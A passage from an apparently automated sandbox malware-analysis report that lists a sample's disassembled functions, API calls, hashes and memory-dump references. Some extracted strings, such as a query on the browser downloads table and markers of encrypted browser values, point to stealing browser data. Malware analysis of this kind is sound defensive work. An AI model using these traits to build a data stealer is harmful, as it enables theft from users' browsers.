                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocLocal_memset
                                                                                                                                                                        • String ID: ERROR_V128$v10$v20
                                                                                                                                                                        • API String ID: 52611349-1964637325
                                                                                                                                                                        • Opcode ID: e277b41c235d36b63d12e056cff5c7b4d2d9271189b348b55fb9c17cde10b90a
                                                                                                                                                                        • Instruction ID: f89f33d47bf028f031c911378068b663f93f63819689b20068009878a9d7ee17
                                                                                                                                                                        • Opcode Fuzzy Hash: e277b41c235d36b63d12e056cff5c7b4d2d9271189b348b55fb9c17cde10b90a
                                                                                                                                                                        • Instruction Fuzzy Hash: 1A41AF72A00118ABCB10EFA9DC419EE7BA9FF54B10F554525FD00E7280EB70EE458BA0
                                                                                                                                                                        Function 0018F286 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0018F29C
                                                                                                                                                                          • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECAA
                                                                                                                                                                          • Part of subcall function 001AEC95: __CxxThrowException@8.LIBCMT ref: 001AECBF
                                                                                                                                                                          • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECD0
                                                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0018F2BB
                                                                                                                                                                        • _memmove.LIBCMT ref: 0018F2F5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 3404309857-4289949731
                                                                                                                                                                        • Opcode ID: f0f44e7635b151cfeb665843e9c5ed5b38e06191b50cdebfd3d3fdbff80cf609
                                                                                                                                                                        • Instruction ID: 10f9ce4ca2b852f17e9ebcc47fa01c571dafaf73a84386fb2b783ec25af69753
                                                                                                                                                                        • Opcode Fuzzy Hash: f0f44e7635b151cfeb665843e9c5ed5b38e06191b50cdebfd3d3fdbff80cf609
                                                                                                                                                                        • Instruction Fuzzy Hash: FA115E753006059FDB08FF68D89196973AAFF55320754452DF816CB282C770EA82CF95
                                                                                                                                                                        Function 00189278 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018947C
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00189497
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                        • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                        • API String ID: 2500673778-2241552939
                                                                                                                                                                        • Opcode ID: 59b8accaadd6a912d86efc7172105d91f070aa2b57fcc5ca5b1e2ca5434e4530
                                                                                                                                                                        • Instruction ID: 8b26090aa275ff6fdd96b5cf81d3a6048112754e1ead2a03ef429bc585b77244
                                                                                                                                                                        • Opcode Fuzzy Hash: 59b8accaadd6a912d86efc7172105d91f070aa2b57fcc5ca5b1e2ca5434e4530
                                                                                                                                                                        • Instruction Fuzzy Hash: FA714E32D00129ABDF02FBA4ED468DDB7B4EF29705F524061F511B71A2DB70AE468F91
                                                                                                                                                                        Function 001A5763 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _freemalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3576935931-0
                                                                                                                                                                        • Opcode ID: 5f9960712b1479561553a040ecadc8582bf34c72aeeb82c6e2f0921975b7e853
                                                                                                                                                                        • Instruction ID: 2a17386375a8561f70a02dd0768d171fe56fa909a9212a52191c8ff79713ffc6
                                                                                                                                                                        • Opcode Fuzzy Hash: 5f9960712b1479561553a040ecadc8582bf34c72aeeb82c6e2f0921975b7e853
                                                                                                                                                                        • Instruction Fuzzy Hash: 36113A3B408A00EBCF223FB4BC05B5A7B97AF573B0B704125F859AA551DB34888087A4
                                                                                                                                                                        Function 001920E3 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 36stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • StrStrA.SHLWAPI(?,00000000,?,?,?,001937D4,00000000,00000010), ref: 001920EE
                                                                                                                                                                        • lstrcpynA.KERNEL32(003DE718,?,00000000,?), ref: 00192107
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00192119
                                                                                                                                                                        • wsprintfA.USER32 ref: 0019212B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                        • String ID: %s%s
                                                                                                                                                                        • API String ID: 1206339513-3252725368
                                                                                                                                                                        • Opcode ID: 47c29fd494b08b284e4419da2159f97af0b709dbe61064645f8c4def35d972f8
                                                                                                                                                                        • Instruction ID: 24fbfb8ff3cf0888dee4001b17093da6e45a616e663791e8968d553e0e56daab
                                                                                                                                                                        • Opcode Fuzzy Hash: 47c29fd494b08b284e4419da2159f97af0b709dbe61064645f8c4def35d972f8
                                                                                                                                                                        • Instruction Fuzzy Hash: 6CF0823720121A7BEB022B99FC48DAABFADDF557A9F040026F9089A211C771592586E1
                                                                                                                                                                        Function 001A6769 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __getptd.LIBCMT ref: 001A6775
                                                                                                                                                                          • Part of subcall function 001A49A4: __getptd_noexit.LIBCMT ref: 001A49A7
                                                                                                                                                                          • Part of subcall function 001A49A4: __amsg_exit.LIBCMT ref: 001A49B4
                                                                                                                                                                        • __getptd.LIBCMT ref: 001A678C
                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 001A679A
                                                                                                                                                                        • __lock.LIBCMT ref: 001A67AA
                                                                                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 001A67BE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 938513278-0
                                                                                                                                                                        • Opcode ID: 2c276793d6806b8766cfc3e5ed18de0e6756e2ce24e5e666ebdf37ed4913ab84
                                                                                                                                                                        • Instruction ID: 76c31f40f94b09052832f809e2eb33a529de4f649686fe789d27ebb0e417a64b
                                                                                                                                                                        • Opcode Fuzzy Hash: 2c276793d6806b8766cfc3e5ed18de0e6756e2ce24e5e666ebdf37ed4913ab84
                                                                                                                                                                        • Instruction Fuzzy Hash: 8DF0B436924710DBDF35BBF8A903B5E33E06F62728F290219F000A71D2CB645940CA96
                                                                                                                                                                        Function 0019004C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0019006F
                                                                                                                                                                          • Part of subcall function 001AEC48: std::exception::exception.LIBCMT ref: 001AEC5D
                                                                                                                                                                          • Part of subcall function 001AEC48: __CxxThrowException@8.LIBCMT ref: 001AEC72
                                                                                                                                                                          • Part of subcall function 001AEC48: std::exception::exception.LIBCMT ref: 001AEC83
                                                                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0019010E
                                                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00190122
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                                                        • API String ID: 2448322171-3788999226
                                                                                                                                                                        • Opcode ID: 9dd48905545ddf612d41eeda98745df0cfd5e9f45747b54429e4434b7cc2105d
                                                                                                                                                                        • Instruction ID: 6a3a45a444127105fd8ad1e4d3a2b50ffc515d5ec7048b3d994026cb55d90d26
                                                                                                                                                                        • Opcode Fuzzy Hash: 9dd48905545ddf612d41eeda98745df0cfd5e9f45747b54429e4434b7cc2105d
                                                                                                                                                                        • Instruction Fuzzy Hash: 1E31C576A412268FDB1AFFA8EC45AAD7BA9AB19310F11417FF510EB2A0D770C9408B40
                                                                                                                                                                        Function 001883DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
